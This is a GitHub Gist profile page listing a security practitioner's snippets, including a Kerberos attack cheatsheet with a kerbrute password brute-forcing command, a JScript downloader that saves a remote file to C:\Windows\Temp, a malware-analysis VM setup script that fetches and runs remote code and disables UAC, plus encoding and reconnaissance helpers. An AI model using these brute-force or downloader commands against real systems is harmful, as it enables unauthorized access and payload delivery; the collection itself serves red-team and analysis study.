Skip to content

Instantly share code, notes, and snippets.

View macostag's full-sized avatar
🏠
Working from home

Mario macostag

🏠
Working from home
8 followers · 40 following
  • Peru
View GitHub Profile
@macostag
macostag / wmic.bat
Created April 11, 2021 02:18
Convert SID to User/Group Name and User to SID
wmic useraccount where name='test_user' get sid
wmic useraccount where (name='test_user' and domain=′corp.com′) get sid
wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name
@macostag
macostag / kerberos_attacks_cheatsheet.md
Created April 5, 2021 00:11 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@macostag
macostag / setup.ps1
Created November 24, 2020 01:15
Chocolatey script to setup Windows 10 malware analysis box.
#Bypass Execution Policy
Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
#Install boxstarter
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force
#Disable UAC
Disable-UAC
#Disanle Micrsoft Update
@macostag
macostag / TH-AS.txt
Last active March 21, 2024 21:12
Threat Hunting & Adversary Simulation
MITRE ATT&CK
------------
MITRE ATT&CK® :
https://attack.mitre.org
Getting Started with ATT&CK: Detection and Analytics :
https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0
Getting Started with ATT&CK: Adversary Emulation and Red Teaming :
https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3
@macostag
macostag / xorEnc.py
Created April 12, 2020 23:58
XOR python script.
import os
import struct
import sys
#Single Byte XOR
def xor(data,key):
translated = "";
for ch in data:
translated += chr(ord(ch) ^ key)
return translated
@macostag
macostag / testb64Non.py
Last active April 12, 2020 23:57
Encoding and decoding Base64 (Nonstandard Bas64 character set)
import base64
chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz="
encoded = "G6JgP6w="
re_encoded = ""
for en_chr in encoded:
re_encoded += en_chr.replace(en_chr,chr_set[non_chr_set.find(en_chr)])
@macostag
macostag / test.py
Created April 11, 2020 15:04
Encoding and decoding Base64.
import base64
plain_text = "One"
encoded = base64.b64encode(plain_text)
print encoded
decoded = base64.b64decode(encoded)
print decoded
@macostag
macostag / ctl.sh
Created February 10, 2020 02:41
Enum via certificate transparency log.
certstream | grep -E "\.org\.com$"
curl -s https://certspotter.com/api/v0/certs?domain=org.com | jq
@macostag
macostag / shodan-net-enum.py
Created February 10, 2020 02:39
Shodan network block enumeration.
from shodan import Shodan
import ipaddress
import pprint
import json
pp = pprint.PrettyPrinter(indent=2)
api = Shodan('')
net = ipaddress.ip_network('')
for xIp in net.hosts():
@macostag
macostag / downloadWS.vbs
Created June 16, 2019 16:05
Downloader WScript.
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt");